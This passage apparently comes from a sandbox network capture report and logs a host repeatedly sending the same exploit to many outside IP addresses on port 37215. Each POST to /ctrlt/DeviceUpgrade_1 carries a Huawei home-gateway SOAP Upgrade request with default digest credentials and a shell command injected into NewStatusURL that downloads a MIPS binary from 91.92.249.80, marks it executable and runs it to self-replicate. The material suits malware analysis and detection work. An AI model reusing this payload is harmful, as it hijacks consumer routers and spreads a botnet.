                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          814192.168.2.2336368197.218.181.19937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.239377975 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          815192.168.2.2341890157.153.138.5537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.239408016 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          816192.168.2.236063441.125.188.437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.239422083 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          817192.168.2.2355088197.141.215.13737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.239423990 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          818192.168.2.2359892157.78.213.25337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.239459038 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          819192.168.2.233968841.170.250.12237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.240124941 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          820192.168.2.2333460157.77.157.10337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.240168095 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          821192.168.2.2343128169.79.41.737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.240197897 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          822192.168.2.2356922166.19.5.12537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.240242958 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          823192.168.2.2350200105.52.20.16837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.240247965 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          824192.168.2.2341100197.86.75.20537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.240256071 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
